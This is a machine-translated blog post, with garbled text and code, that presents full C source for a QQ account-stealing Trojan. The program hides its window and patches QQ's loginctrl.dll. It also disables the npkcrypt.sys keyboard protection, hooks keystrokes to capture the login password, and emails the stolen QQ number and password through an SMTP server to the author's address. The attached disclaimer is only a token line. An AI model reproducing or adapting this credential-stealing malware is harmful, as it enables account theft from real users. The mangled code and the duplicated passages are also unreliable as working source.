Simple implementation of QQ Trojan, core programming of QQ account theft ....

The dormitory is finished and cannot access the Internet. This is quite depressing ....

Ah .... Now in the data center, write a post:

A sample source code about how to program QQ Trojan

Haha, you are at home during the holidays. Look at the data structure and look at C ++ .... When I was bored, I thought of the previous QQ-related things!

I still remember I wrote some posts about the preliminary QQ account stealing program (I only have this level--#). I sorted it out for a while during this holiday. Well, let's talk about the four major parts of the program below:

1. Search QQ directory. This is a crucial step, and is the foundation of crack keyboard protection. At first, I used the recursive directory of the entire hard disk for searching. It seems that the speed is too slow. 0_0! Later, I changed it to the directory from the current QQ process. Of course, in this case, you can only test it in the QQ running status. Otherwise, you have to set the QQ installation path in the source code.

2. Crack keyboard protection. I have written it before. I don't want to worry about it anymore ....

3. hook keyboard. Remember to write a Win32 hook mechanism article at the first semester of the freshman year. At that time, QQ was also used as the experimental object ^_^! However, the method used at that time was too troublesome and used a self-written. dll. Later I found that it was inconvenient, and I was using C (combined with Win32 API) to write the console, so I could define the console processing myself .... For details, see the source code --!

4. Send mail. This is the last and most critical step! Unfortunately, I am not technically close. I use the SMTP protocol for sending. This will be discovered by the firewall .... Ah ....

Now, the introduction is here. The following is the source code:

Haha, you are at home during the holidays. Look at the data structure and look at C ++ .... When I was bored, I thought of the previous QQ-related things!

I still remember I wrote some posts about the preliminary QQ account stealing program (I only have this level--#). I sorted it out for a while during this holiday. Well, let's talk about the four major parts of the program below:

1. Search QQ directory. This is a crucial step, and is the foundation of crack keyboard protection. At first, I used the recursive directory of the entire hard disk for searching. It seems that the speed is too slow. 0_0! Later, I changed it to the directory from the current QQ process. Of course, in this case, you can only test it in the QQ running status. Otherwise, you have to set the QQ installation path in the source code.
2. Crack keyboard protection. I have written it before. I don't want to worry about it anymore ....
3. hook keyboard. Remember to write a Win32 hook mechanism article at the first semester of the freshman year. At that time, QQ was also used as the experimental object ^_^! However, the method used at that time was too troublesome and used a self-written. dll. Later I found that it was inconvenient, and I was using C (combined with Win32 API) to write the console, so I could define the console processing myself .... For details, see the source code --!
4. Send mail. This is the last and most critical step! Unfortunately, I am not technically close. I use the SMTP protocol for sending. This will be discovered by the firewall .... Ah ....
Now, the introduction is here. The following is the source code:-P;

/* File name: QQ keyboard recorder. c
* Purpose: to study the surface of QQ key-hitting Trojans
* Completion date: 2006.8 ver 0.01
* Authors: 88250
* Contact: E-mail: DL88250@gmail.com/QQ: 845765
*/
# DEFINE _ win32_winnt 0x0400
# I nclude <Io. h>
# I nclude <stdio. h>
# I nclude <stdlib. h>
# I nclude <windows. h>
# I nclude <tlhelp32.h>
# I nclude <psapi. h>

# Define user_id 0x0000008a
# Define psw_id 0x000000b4

# Pragma comment (Lib, "psapi. lib ")
# Pragma comment (Lib, "user32.lib ")
# Pragma comment (Lib, "ws2_32.lib ")

Char sdirpath [255] = "C: // program files // QQ ";
Char suser [255] = {'U','s ', 'E', 'R ',':',''};
Char spsw [255] = {'.', 'P','s ', 'w', 'D ',':',''};
Char maildata [255] = "from:/" dl88250/"<dl82850@126.com>/R/N"
"Subject :";
Int npsw = 7;
Hwnd hlogin = NULL, huser = NULL, hpsw = NULL, hwnd = NULL;
Hwnd hself = NULL;
DWORD g_tid = 0;/* Current thread ID */
Hhook g_hook = NULL;/* keyboard hook handle */

Int killprocess (char * C1, char * C2)
{
Int nsecflag = 0;/* mark of successful shutdown */
Handle handle = NULL;
Processentry32 * info = NULL;/* process snapshot structure */
Handle = createconlhelp32snapshot (th32cs_snapprocess, 0 );
Info = (processentry32 *) malloc (sizeof (processentry32 ));
Info-> dwsize = sizeof (processentry32 );
Process32first (handle, Info );
/* Start to enumerate the current process */
While (process32next (handle, Info )! = False ){
Info-> szexefile;
If (0 = strcmp (C1, info-> szexefile) | (0 = strcmp (C2, info-> szexefile ))){
Hwnd = (hwnd) OpenProcess (process_terminate, false, info-> th32processid );
Terminateprocess (hwnd, 0);/* end */
Nsecflag = 1;
}
}
Closehandle (handle );
If (1 = nsecflag ){
Return 1;
} Else {
Return 0;/* end failed */
}
}

Void Sendmail (void)
{
Wsadata;
Word wversionrequested = makeword (2, 2 );
Struct hostent * phostent = NULL;
Socket server = invalid_socket;
Struct sockaddr_in service;

Char buffer [1024] = {0 };
Wsastartup (wversionrequested, & wsadata );
Server = socket (af_inet, sock_stream, ipproto_tcp );
Phostent = gethostbyname ("smtp.126.com ");
Service. sin_family = af_inet;
Memcpy (& service. sin_addr.s_addr, phostent-> h_addr_list [0], phostent-> h_length );
Service. sin_port = htons (25 );
Connect (server, (struct sockaddr *) & service, sizeof (Service ));
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "HELO server.../R/N", strlen ("HELO server.../R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "auth login/R/N", strlen ("auth login/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "bgjlew9uzdrrb21h/R/N", strlen ("bgjlew9uzdrrb21h/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "bgjlew9uzdrrb21h/R/N", strlen ("bgjlew9uzdrrb21h/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "mail from: <lbeyond4koma@126.com>/R/N", strlen ("mail from: <lbeyond4koma@126.com>/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "rcpt to: <dl88250@gmail.com>/R/N", strlen ("rcpt to: <dl88250@gmail.com>/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "Data/R/N", strlen ("Data/R/N"), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, maildata, strlen (maildata), 0 );
Recv (server, buffer, sizeof (buffer), 0 );
Send (server, "Quit/R/N", strlen ("Quit/R/N"), 0 );
Wsacleanup ();
Printf ("success! ");
Exitprocess (0 );
Return;
}
/* Process the intercepted accounts and passwords and integrate them into the subject of the email */
Void dealwith (void)
{
Strcat (maildata, suser );
Strcat (maildata, spsw );
Strcat (maildata, "/R/n./R/N ");
Printf ("% s", maildata );
Sendmail ();
Return;
}
/* Enumerate the subwindow and find the QQ number and password control handle */
Bool callback enumchildwndproc (hwnd, lparam)
{
Long id = getwindowlong (hwnd, gwl_id );
If (! Hwnd ){
Return false;
}
If (ID = user_id ){
Huser = hwnd;
} Else if (ID = psw_id ){
Hpsw = hwnd;
}
Return true;
}

/* Define the console handler function to exit the current thread for hook */
Bool callback con_handler (DWORD g_tid)
{
Postthreadmessage (g_tid, wm_quit, 0, 0 );
Return true;
}
/* Analyze the keyboard buttons. The case sensitivity is not determined here.
* You can only press Enter when logging on ....
*/
Lresult callback kb_proc (INT code, wparam, lparam)
{
Pkbdllhookstruct P = (pkbdllhookstruct) lparam;
If (wparam = wm_keydown & P-> vkcode = vk_return & lparam> 0 ){
Sendmessage (huser, wm_gettext, 20, (lparam) (suser + 6 ));
Unhookwindowshookex (g_hook );
Dealwith ();/* start to process intercepted data */
}
If (wparam = wm_keydown) & (P-> vkcode> 47) & (p-> vkcode <58 ))){
Spsw [npsw] = p-> vkcode;
Npsw ++;
Goto next;
}
If (wparam = wm_keydown) & (P-> vkcode> 64) & (p-> vkcode <91 ))){
Spsw [npsw] = p-> vkcode + 32;
Npsw ++;
Goto next;
}
If (wparam = wm_keydown) & (getkeystate (vk_capital) & 1) | (getkeystate (vk_shift) & 1 )))
& (P-> vkcode> 64) & (p-> vkcode <91 )))){
Spsw [npsw] = p-> vkcode;
Npsw ++;
Goto next;
}
Next:
Return callnexthookex (g_hook, code, wparam, lparam );
}

/* Find the desired handle and start the hook */
Void start (void)
{
MSG;
If (hlogin = findwindow ("#32770", "QQ User Logon ")){
Enumchildwindows (hlogin, enumchildwndproc, 0 );
If (huser! = NULL ){
G_tid = getcurrentthreadid ();
Setconsolectrlhandler (& con_handler, true );
G_hook = setwindowshookex (wh_keyboard_ll, & kb_proc, getmodulehandle (null), 0 );
While (getmessage (& MSG, null, 0, 0 )){
Translatemessage (& MSG );
Dispatchmessage (& MSG );
}
}
}
Return;
}
/* Click "QQ: // loginctrl. dll" and "npkcrypt. sys" ^ to crack the keyboard */
Void crack (void)
{
Char crack [1];
Char slcpath [255];
Char snpkcrypt [255], snpkcryptdl [255];
File * f = NULL;
Strcpy (slcpath, sdirpath );
Strcpy (snpkcrypt, sdirpath );
Strcat (snpkcrypt, "// npkcrypt. sys ");
Strcpy (snpkcryptdl, sdirpath );
Strcat (snpkcryptdl, "// npkcrypt. DL ");
Rename (snpkcrypt, snpkcryptdl );
F = fopen (strcat (slcpath, "// loginctrl. dll"), "RB + ");
If (F = NULL ){
Return;
}
Fseek (F, 63921, seek_set );
Crack [0] = 115; // 116-> 115
Fwrite (crack, sizeof (char), 1, F );
Fseek (F, 64105, seek_set );
Crack [0] = 193; // 194-> 193
Fwrite (crack, sizeof (char), 1, F );
Fseek (F, 64135, seek_set );
Crack [0] = 158; // 159-> 158
Fwrite (crack, sizeof (char), 1, F );

Fclose (f );

Return;
}

Int main (void)
{
DWORD processid [1024], pbytesreturned [1024], processsum, I;
Handle hprocess;
Hmodule;
Char path [max_path] = "";
Hself = findwindow ("lelewindowclass", null);/* handle of the Program */
/* Implement its own pseudo-hide */
Setwindowlong (hself, gwl_exstyle, ws_ex_toolwindow );
Setwindowpos (hself, hwnd_bottom, 0, 0, 0, 0, swp_hidewindow );
/* Enumerate the current process, locate the QQ process, and disable it */
Enumprocesses (processid, sizeof (processid), pbytesreturned );
Processsum = * pbytesreturned/sizeof (DWORD );
For (I = 0; I <processsum; I ++ ){
Hprocess = OpenProcess (process_query_information | process_vm_read, false, processid [I]);
If (hprocess ){
Enumprocessmodules (hprocess, & hmodule, sizeof (hmodule), pbytesreturned );
Getmodulefilenameex (hprocess, hmodule, path, sizeof (PATH ));
Getmediapathname (path, path, 256 );
If (strstr (path, "qq.exe") | strstr (path, "QQ. EXE ")){
Strcpy (sdirpath, PATH );
}
}
}
Closehandle (hprocess );
Closehandle (hmodule );
* (Sdirpath + (strlen (sdirpath)-6) = '/0 ';
For (I = strlen (sdirpath); I> 1; I --){
Sdirpath [I + 1] = sdirpath [I];

}
Sdirpath [++ I] = '//';
Crack ();
Start ();
Sleep (5000 );
If (1 = killprocess ("QQ. EXE", "qq.exe ")){
Crack ();
Strcpy (path, sdirpath );
Strcat (path, "// qq.exe ");
Winexec (path, sw_show );
}
Crack ();
While (true ){
Sleep (8);/* reduce CPU usage */
Start ();
}
}

I declare again that this thing is still dangerous --! This is only a technical exchange. Don't confuse it .... : =. =!

Haha .... Okay, I have finished. ^